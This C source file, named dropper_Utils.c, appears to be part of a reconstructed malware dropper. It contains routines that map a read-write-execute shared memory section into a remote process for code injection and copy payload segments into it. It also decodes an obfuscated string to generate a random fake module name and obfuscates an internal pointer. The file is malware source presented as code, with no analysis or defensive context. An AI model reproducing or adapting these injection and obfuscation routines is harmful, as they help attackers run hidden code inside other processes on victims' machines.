dropper_Utils.c

1. #include "5. Utils.h"
2. #include "9. AssemblyBlock2.h"
3. #include "A. EncodingAlgorithms.h"
4. #include "C. CodeBlock.h"
5.  
6. #include "config.h"
7. #include "define.h"
8.  
9. // 100% (C) CODE MATCH
10. INT32 SharedMapViewOfSection(HANDLE hRemote, SIZE_T nSize, PHANDLE ppSection, PVOID *ppLocal, PVOID *ppRemote)
11. {
12.     SIZE_T iViewSize;           // Size of the map view
13.     NTSTATUS nRet;              // Value returned by the functions
14.     LARGE_INTEGER liMaxSize;    // Maximum size that can be allocated
15.  
16.     // Copy the values
17.     iViewSize = nSize;
18.    
19.     liMaxSize.LowPart  = nSize;
20.     liMaxSize.HighPart = 0;
21.    
22.     // Create a section and grant all access (read, write, execute)
23.     nRet = _F(ZwCreateSection)(ppSection, SECTION_ALL_ACCESS, NULL, &liMaxSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, 0);
24.     HAS_FAILED(nRet, -5)
25.    
26.     // Create the 1st Map View for the local process
27.     nRet = _F(ZwMapViewOfSection)(*ppSection, GetCurrentProcess(), ppLocal , NULL, 0, NULL, &iViewSize, ViewShare, 0, PAGE_EXECUTE_READWRITE);
28.     HAS_FAILED(nRet, -5)
29.    
30.     // Create the 2nd Map View for the remote process
31.     nRet = _F(ZwMapViewOfSection)(*ppSection, hRemote            , ppRemote, NULL, 0, NULL, &iViewSize, ViewShare, 0, PAGE_EXECUTE_READWRITE);
32.     HAS_FAILED(nRet, -5)
33.    
34.     return 0;
35. }
36.  
37. // 99% (C) CODE MATCH
38. void CopySegmentIntoSections(PVOID *ppLocal, PVOID lpRemote, INT32 *nGlobalPtr, PSECTION_SEGEMENT_INFO lpRemoteInfo, PVOID lpBytes, DWORD dwSize)
39. {
40.     // If bytes has been provided copy them in the shared section
41.     if(dwSize)
42.         __memcpy(*ppLocal, lpBytes, dwSize);
43.    
44.     // Update the information for the remote view
45.     lpRemoteInfo->SegmentAddress = (DWORD)lpRemote + *nGlobalPtr;
46.     lpRemoteInfo->SegmentSize = dwSize;
47.    
48.     // Update the local information
49.     *ppLocal  = ppLocal + dwSize;
50.     *nGlobalPtr += dwSize;
51. }
52.  
53. const WORD ENCODED_KERNEL32_DLL_ASLR__08x[23] =
54. {
55.     0xAE59, 0xAE57, 0xAE40, 0xAE5C,
56.     0xAE57, 0xAE5E, 0xAE21, 0xAE20,
57.     0xAE3C, 0xAE56, 0xAE5E, 0xAE5E,
58.     0xAE3C, 0xAE53, 0xAE41, 0xAE5E,
59.     0xAE40, 0xAE3C, 0xAE37, 0xAE22,
60.     0xAE2A, 0xAE6A, 0xAE12
61. };
62.  
63. // 100% (C) CODE MATCH
64. INT32 GetRandomModuleName(GENERAL_INFO_BLOCK *lpInfoBlock, LPCWSTR lpszLibraryName)
65. {
66.     WCHAR __KERNEL32_DLL_ASLR_08x[42];
67.     DWORD dwRandom;
68.  
69.     // If a library name has been passed use it
70.     if(lpszLibraryName)
71.     {
72.         if(lstrlenW(lpszLibraryName) >= 31)
73.             return -1;
74.        
75.         lstrcpyW(lpInfoBlock->RandomLibraryName, lpszLibraryName);
76.     }
77.     else
78.     {
79.         dwRandom = GetTickCount() + 3 * GetCurrentThreadId();
80.         DecodeModuleNameW(ENCODED_KERNEL32_DLL_ASLR__08x, __KERNEL32_DLL_ASLR_08x);
81.        
82.         do
83.             wsprintfW(lpInfoBlock->RandomLibraryName, __KERNEL32_DLL_ASLR_08x, dwRandom++);
84.         while(GetModuleHandleW(lpInfoBlock->RandomLibraryName));
85.     }
86.    
87.     lpInfoBlock->OriginalAddress = (DWORD)lpInfoBlock ^ X_PTR_KEY;
88.     lpInfoBlock->UnknownZero0 = 0;
89.     lpInfoBlock->AlignAddressesFunction = (DWORD)BLOCK4_AlignAddresses;
90.    
91.     return 0;
92. }